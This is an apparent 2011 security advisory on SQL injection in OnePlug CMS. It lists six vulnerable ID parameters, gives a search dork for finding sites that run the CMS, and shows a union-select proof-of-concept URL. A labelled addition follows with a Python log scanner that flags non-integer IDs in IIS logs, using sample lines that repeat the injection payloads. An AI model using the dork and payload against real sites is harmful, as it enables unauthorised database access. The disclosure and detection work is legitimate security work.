Wednesday, March 16, 2011

OnePlug CMS Vulnerable to Multiple SQL Injection


Title : OnePlug CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.webpromo-inc.com/
Found by : p0pc0rn
Dork : intext:"Powered by OnePlug CMS"


SQL - Microsoft Access
-------------------------------
Parameters
index.asp?Team_ID=[SQL]
service_info.asp?Service_ID=[SQL]
product_details.asp?Product_ID=[SQL]
product_list.asp?Category_ID=[SQL]
product_info.asp?Product_ID=[SQL]
category_list.asp?Category_ID=[SQL]

more..

POC
---
http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a



thanks,
-p0pc0rn-
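
Added example, not part of the original advisory: a check a site operator could run over IIS W3C logs to flag requests to the pages listed above whose ID parameter is not a plain integer. The log column layout, the sample lines and the function names are constructed for illustration, and the check assumes the IDs are non-negative integers.

```python
from urllib.parse import parse_qsl

# Page -> ID parameter, from the advisory's list (lower-cased; ASP names are case-insensitive).
ID_PARAMS = {
    "index.asp": "team_id",
    "service_info.asp": "service_id",
    "product_details.asp": "product_id",
    "product_list.asp": "category_id",
    "product_info.asp": "product_id",
    "category_list.asp": "category_id",
}

def suspicious_value(stem, query):
    """Return the decoded ID value if it is not a plain integer, else None."""
    wanted = ID_PARAMS.get(stem.rsplit("/", 1)[-1].lower())
    if wanted is None or query in ("", "-"):
        return None
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(query):
        if name.lower() == wanted and not (value.isascii() and value.isdigit()):
            return value
    return None

def scan_w3c(lines):
    """Return (line_no, client_ip, page, value) for each flagged request."""
    fields, hits = [], []
    for n, line in enumerate(lines, 1):
        if line.startswith("#") or not fields:
            if line.startswith("#Fields:"):   # column order is declared per log file
                fields = line.split()[1:]
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "")
        value = suspicious_value(stem, row.get("cs-uri-query", "-"))
        if value is not None:
            hits.append((n, row.get("c-ip", "?"), stem, value))
    return hits

# Constructed sample log (documentation IP addresses), not real traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-03-16 10:00:01 192.0.2.10 GET /category_list.asp Category_ID=1 200
2011-03-16 10:00:05 192.0.2.77 GET /category_list.asp Category_ID=1+union+select+0+from+test.a 500
2011-03-16 10:00:09 192.0.2.10 GET /product_info.asp Product_ID=42&lang=en 200
2011-03-16 10:00:12 192.0.2.77 GET /Product_Info.asp product_id=42%27 500
""".splitlines()

if __name__ == "__main__":
    print(*scan_w3c(SAMPLE_LOG), sep="\n")
```

The same integer-only rule, applied in the application before the value reaches the query, is what closes the issue; the log check only shows whether the listed pages have been probed.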